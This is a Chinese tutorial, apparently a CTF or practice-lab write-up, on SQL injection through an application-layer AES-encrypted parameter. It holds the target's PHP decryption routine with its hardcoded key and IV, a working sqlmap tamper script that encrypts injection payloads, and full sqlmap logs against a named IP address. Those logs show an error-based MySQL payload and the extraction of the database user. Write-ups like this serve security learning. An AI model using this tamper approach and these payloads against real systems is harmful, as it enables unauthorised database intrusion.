实战经验分享丨记一次SQL注入题目的解题思路
本文是i春秋论坛(https://bbs.ichunqiu.com/)的表哥为大家分享一个在实战过程中会经常遇到的SQL注入题目及解题思路,公众号旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。
这是一个比较基础的题,在实战中经常会遇到。比如说前端利用JavaScript公钥加密并传输给后端,后端通过私钥进行解密执行,这样做的好处就在于可以有效的避免了中间人攻击,跟SSL原理差不多,只是SSL在传输层,而这种加密是在应用层。
简单介绍了一下分享这篇文章的原因,那么就开始进入主题吧~
源码分析
先来看下后端的PHP源码:
function decode($data){
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
$data = mdecrypt_generic($td,base64_decode(base64_decode($data)));
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
if(substr(trim($data),-6)!=='_mozhe'){
echo '<script>window.location.href="/index.php";</script>';
}else{
return substr(trim($data),0,strlen(trim($data))-6);
}
}
这是一个解密函数,我们来逐条分析。
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
首先定义了一个变量,这个变量调用了打开PHP crypto库中的加密函数。定义了加密方法为AES加密,加密模式为CBC,数据块为128位。
mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
初始化加密缓冲区,描述为变量td。
加密密钥为:ydhaqPQnexoaDuW3
$data = mdecrypt_generic($td,base64_decode(base64_decode($data)));
进行两次base64的解密后,使用上述方法进行将加密的密文还原成明文。
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
结束加密,关闭加密模块。
if(substr(trim($data),-6)!=='_mozhe'){
echo '<script>window.location.href="/index.php";</script>';
}else{
return substr(trim($data),0,strlen(trim($data))-6);
}
如果明文的后6位不是_mozhe,那么解密函数将不返回数据,并且跳转到index.php上。
如果明文后6位是_mozhe,那么将返回加密值,并且去掉后面的_mozhe。
使用python构造加密函数
既然都已经知道了解密函数的写法,那就反推写出加密函数就好了。
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
home.php?mod=space&uid=210785 : cryptomozhe.py
@Author : Angel
home.php?mod=space&uid=163876 : W3bSafe
'''
from base64 import b64decode,b64encode
from Crypto.Cipher import AES
def encrypt(text):
cryptor = AES.new('ydhaqPQnexoaDuW3', AES.MODE_CBC, IV="2018201920202021")
length = 16
count = len(text)
add=count % length
if add:
text = text + ('\0' * (length-add))
ciphertext = cryptor.encrypt(text)
return b64encode(b64encode(ciphertext))
def decrypt(text):
cryptor = AES.new('ydhaqPQnexoaDuW3', AES.MODE_CBC, IV="2018201920202021")
length = 16
count = len(text)
add=count % length
if add:
text = text + ('\0' * (length-add))
ciphertext = cryptor.decrypt(b64decode(b64decode(text)))
return ciphertext
if __name__ == '__main__':
print("encrypt:"+encrypt(str(raw_input("Please input text with encrypt:"))))
print("decrypt:"+decrypt(str(raw_input("Please input text with decrypt:"))))
来尝试下写的加解密脚本是否正确与通用,首先我们先用这个Python脚本对明文:This is a test value_mozhe进行加密,得到加密后的结果为密文:
ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=
Please input text with encrypt:This is a test value_mozhe
encrypt:ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=
Please input text with decrypt:ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=
decrypt:This is a test value_mozhe
然后在写一个PHP文件,使用题目中所给的php函数对刚刚加密过的密文进行解密。
<?phpfunction decode($data){ $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
$data = mdecrypt_generic($td,base64_decode(base64_decode($data)));
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
if(substr(trim($data),-6)!=='_mozhe'){
echo '<script>window.location.href="/index.php";</script>';
}else{
return substr(trim($data),0,strlen(trim($data))-6);
}}$val="ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=";echo decode($val);
执行结果:
解密成功。
构造sqlmap tamper脚本,进行注入测试
已经验证了python加密函数的可行性,那么直接把构造好的加密函数写成sqlmap,能运行的tamper脚本就ok了。别忘了要在明文后面加上_mozhe:
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File : mozhe.py
@Author : Angel
@Team : W3bSafe
'''
import base64
from Crypto.Cipher import AES
from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
__priority__ = PRIORITY.LOW
def encrypt(text):
cryptor = AES.new('ydhaqPQnexoaDuW3', AES.MODE_CBC, IV="2018201920202021")
length = 16
count = len(text)
add=count % length
if add:
text = text + ('\0' * (length-add))
ciphertext = cryptor.encrypt(text)
return base64.b64encode(ciphertext)
def dependencies():
pass
def tamper(payload, **kwargs):
payload=encrypt((payload+"_mozhe").encode('utf-8'))
payload=base64.b64encode(payload)
return payload
让sqlmap加载tamper进行注入测试:
PS C:\WINDOWS\system32> sqlmap -u "http://219.153.49.228:40570/news/list.php?id=" --tamper=mozhe --dbms=mysql --technique=E
___
__H__
___ ___[.]_____ ___ ___ {1.2.5.10#dev}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:43:43
[11:43:43] [INFO] loading tamper module 'mozhe'
[11:43:44] [WARNING] provided value for parameter 'id' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[11:43:44] [INFO] testing connection to the target URL
[11:43:44] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[11:43:44] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[11:43:44] [INFO] testing for SQL injection on GET parameter 'id'
[11:43:44] [INFO] testing 'MySQL >= 5.0 与-AND 基于报错注入 - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:43:44] [INFO] testing 'MySQL >= 5.0 基于报错注入 - Parameter replace (FLOOR)'
[11:43:45] [INFO] GET parameter 'id' is 'MySQL >= 5.0 基于报错注入 - Parameter replace (FLOOR)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 9 HTTP(s) requests:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 基于报错注入 - Parameter replace (FLOOR)
Payload: id=(SELECT 1957 FROM(SELECT COUNT(*),CONCAT(0x7171766b71,(SELECT (ELT(1957=1957,1))),0x71786a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[11:43:47] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[11:43:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx
back-end DBMS: MySQL >= 5.0
[11:43:47] [INFO] fetched data logged to text files under 'C:\Users\admin\.sqlmap\output\219.153.49.228'
[*] shutting down at 11:43:47
查询注入语句:
PS C:\WINDOWS\system32> sqlmap -u "http://219.153.49.228:40570/news/list.php?id=" --tamper=mozhe --dbms=mysql --technique=E -v 3 --current-user
___
__H__
___ ___[.]_____ ___ ___ {1.2.5.10#dev}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:46:20
[11:46:20] [DEBUG] cleaning up configuration parameters
[11:46:20] [INFO] loading tamper module 'mozhe'
[11:46:20] [DEBUG] setting the HTTP timeout
[11:46:20] [DEBUG] creating HTTP requests opener object
[11:46:20] [DEBUG] forcing back-end DBMS to user defined value
[11:46:21] [WARNING] provided value for parameter 'id' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[11:46:21] [INFO] testing connection to the target URL
[11:46:21] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 基于报错注入 - Parameter replace (FLOOR)
Payload: id=(SELECT 1957 FROM(SELECT COUNT(*),CONCAT(0x7171766b71,(SELECT (ELT(1957=1957,1))),0x71786a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Vector: (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---[11:46:21] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[11:46:21] [INFO] testing MySQL
[11:46:21] [DEBUG] searching for error chunk length...
[11:46:21] [PAYLOAD] RFA2U25sUmZkKzFxMWdtL1p2V2UwS0ZLWWVvdGx3cHJSTjRGZm56aDRteHRFdDZWbCtvRzdwK1gzTVV1cnFEaElYVStxcEFoWlg3ZzlkRldQaUFkL0J5Zzc4ZW1XT3pPS09BRU9kM3RodUFWNHdHNUFmQlNsMmh1cVZaQkNLQzRmVlhMUVV3SmVxUUw3RWNpVGdyNGNFbm8rTnZZNnFrK1BVWm1heloyUWNOQjBHUEpTTzIzNmkxVU5hcSs2MkpxUXRIbjNFK2l1dG5lZU8raWhlaUhLTHBRMVdNS3k2RWxaMlZWbnZHaEU4MD0=
[11:46:21] [PAYLOAD] eWhEcGExNjE4RVlaQWxtY0NHc0paRTNKZ3FkQmFYZFBRa3dqRVQ2Z255c2ZqdGtuZHJ3UUV2Z0hxM2ZBVUszOU5wRCtRd3dSamxMQjNNdi9IaG5OV1d0cW5lMERWeTloY1VOTDJ6T2RmT3ZURnk1L29Ici81MmJVR3E2eXFvL0VxUWY4dzM0SGp2WHBidFF1amJHdUJNcGx1djBqbEJQQmljNUpna0RXV1JjVCtYVWhraWRGSDNEN0g5a2Robk9uc0MxUTl1djFuU1c3b3ZER0lVVE1XTWlFdEhYNFhzQWl6dzdvYnZQMWozdz0=
[11:46:21] [PAYLOAD] d3FlMjAyVFRiZVRPaEx1RWVGMW9kajRzUFRVQVkzMmtFMk4vZ0dCOHQranVkZ2o5dkFubnBTY0NWTG5oUnpXUk4wNWN6YXNRQjRWMVBzaFk4ZTBTV3pXMm9mWFRLT0FnNHVFWE1IVjdMNTFhNEs0a2Q4RmNCcmxUd2ZMNjVVOWlpU1llcW9uM1VaTk4wYzN1VWR4aFJvQUpBVG85VFVnd3JXSlE4UHk2UEwzbGMwekhNbFRCVlFpN1RtUU5MN1BDeVBnRUQwQkd5UVJIcGpjS1N0RG5CUWk3N0VyOEI2UWFhRElFSXR2cHFzOD0=
[11:46:21] [PAYLOAD] RDBtcGNRSlpGczgwc2dlMEVoV3A0Y3NJeEJMeEZsU3R2cDFwdGlvUDhDK3ZKeTZjTmN0Y21rSEJRWUZjckU3MWs3SWloWFZYeGR4a29hOUlhSlZJdS9kUmxlWnAxcm1DdGYxeUlEendlSGNKVkZ0WVdMaERob0QvTFdqUFViRDgxeitOVUdHcTdpdWdsRDYvUHMza3dNVU0xRUFDZXZkd1EvelR0cDRVWThEV2pqS05CVEdibDFzWXUwMlNwbzdyWitHK09CVkNlY3hIT3ljYlA0WXRiZ1gzcXBQUFNqbHVEcXF5VHhWUllRTT0=
[11:46:21] [PAYLOAD] RGpHTFQ3b21KMytJL2dMWWs5aTlnWklRTG1rQkYwKzRDYjc5TGxOSnBtVlVxZjRuZ1pBcGVFUk1DS05QNFNIbUVaQlIyZTc4WVJ3djVweHJIMi96K3FkcWs5SkZ6V1B5dWZUSHM1R1I2SCtCYkprNHI5elA0TStVdXJ6RGN0c3NHVytFaERGMCsvcWVmWjNwcncrZXk1VnNtN1hQRWhaOUZUeGxNK3JkeGZsUUtSK2RwR3J1Wm9tOVBDTDFnZncwUkhGa08zWEhmZHg3eHZrTHYxd2FycEtYeVlxMHhxcUo1ZVB2Ym1nbWw5YXFFY3VrNW80SlN6dFBRbU5FNFZRV1FKOWZlcVZpQ21jVUpFcUNFd3BINVE9PQ==
[11:46:21] [DEBUG] performed 5 queries in 0.35 seconds
[11:46:21] [INFO] confirming MySQL
[11:46:21] [PAYLOAD] OTF0QkkwZDFQVm9od003UGR6dUxGS3hrcUlXT3RJSTExUlkrRmpwcjV5cWZ3MTNpc0dia3NUQU11UnR**c4b1RBREhRbHlPL1h6UUJDY01mYmRoQktHcXY0YWdIZVFaZ08va0NNTzdtcms5bGJNQ2VoUUNYeC9weFE5dEZvdzdIdmJuUDJXTzNqdHdNc0VjcnV6ZWw0L3NMRWx5dXdZMzNYUlluUndGMEtLYW9GZ0hvT2FjOWVsdFVWdGdTZEVnQUZ3S1AzRDBYUEdwUUV2UUx1c2RFa041NTF3UERDVlJPcHQzRzdXMEtOSlA0dEJiRXpGeE1zTlUwTmpXTmFCdVNRdG1YaE5WelVldmlxL1VsY1d4bHc9PQ==
[11:46:21] [DEBUG] performed 1 queries in 0.07 seconds
[11:46:21] [PAYLOAD] Q0dLbmNOU1FkMFgybFQ0d1ozS3RNVmtlaTVPdVdrUzg2VzQwRFNXM2ZuYlpMaURTZmd2ZC9NV1U0b2tsT1FxT3FmekJGSjdWR0JiNG5HS3ViMktnNmRTU0xzZit6RkJUcjkvVjF5RlhObzdXdzBjSkpJYW5KaWN0ZU5rU25FcDlKV1poMFRDQzN0bEx0bzJteTBEQVhNbkR1eEJYWjNlOWk1Wkp2OGZ6T3RYS2M1OGJCS2htamQxajdXWmIyZ3V0a0FncFRVMFZCWm1aVVZ4QnhXOEJRTUtWZC9Fd0lmaUdNSlFTNHNrSUV5L1Uxb3hoWVdDcGNFcXpvVXRhUHcrWTlPbXFTb0t1RVBsQXF3bFVCakYzdVljNFRYcTg1Y3hsRjFFcy8wbEY4TTA9
[11:46:21] [DEBUG] performed 1 queries in 0.06 seconds
[11:46:21] [PAYLOAD] ank5ZzZJb3ZNOWFvR2JhQWQrRG9OUmY1MnlIczZMalZiY0IweS9leUp5WitncTlubU5ML0cvT0RmTTV2QmpiRWhiSktMazA0UkNkSEU3ZkJCTmhmNGlrQ0JtMVh2c0xFSGg4STcrTzVObWRpYlNXTUtVY0RpVDcrT3g5czdaTzNmY1NzTnNrSnJ6VmppZ2lNUWI4QVBIajlDVktRdG1yb0ZBcGpXa3N2ejNZbTE1UUZHdnBZSC91U09IM1hCeHg2VlV6Ni9mWHlEZlZ3WDhnSjI4dDJtc3l4SXJlRGVEVjhkZEJKZjg1dWtyVDRZcjFwbWlhRVJPcHJpbThyblFNeHNHKytkT2t1c2tLb2VpdHdSMjJLc09RQlpqam5MbUhaUUZ5Vzc0dkk2SUE9
[11:46:21] [DEBUG] performed 1 queries in 0.06 seconds
[11:46:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
[11:46:21] [INFO] fetching current user
[11:46:21] [PAYLOAD] dGV3cy9FUklKc3lJei9iV1lzVzhFck5DaDJzY1UvQVV3bXQ4NERwOFRkMi9ncGExU0JLRnNYSitDQ3lVVlZUZmxUcFFDUFRzckhJS2tLVVRDbHlUZjZSenVEWW05aytrN3BYdEwxT3g2aXJLc1BjWXRzZThSa2FiN0FhVkF6Q0RHek5tSFNncjR6RnJ5TjFKRkxZMi9YMmlMV0Zrc3RLbTNCbDFmUzZJTEhPM2l1dGhrRkpDOTh5S1c3S1dGV0E3QTNNaWY4SFNCdHJmS0FpZmQ4ajhBT1d5RjFtaVR5TnBjOGx5WGVxN09kVHJlUFRURTZNL2JCeUNRSnVQa20xWkxZRW9FZytiRzRsZ1lsdzRKa1hPWlE9PQ==
[11:46:21] [INFO] retrieved: root@localhost
[11:46:21] [DEBUG] performed 1 queries in 0.06 seconds
current user: 'root@localhost'
[11:46:21] [INFO] fetched data logged to text files under 'C:\Users\admin\.sqlmap\output\219.153.49.228'
[*] shutting down at 11:46:21
PS C:\WINDOWS\system32>
对sqlmap的payload进行测试。
完成。
今天的文章分享,小伙伴们看懂了吗?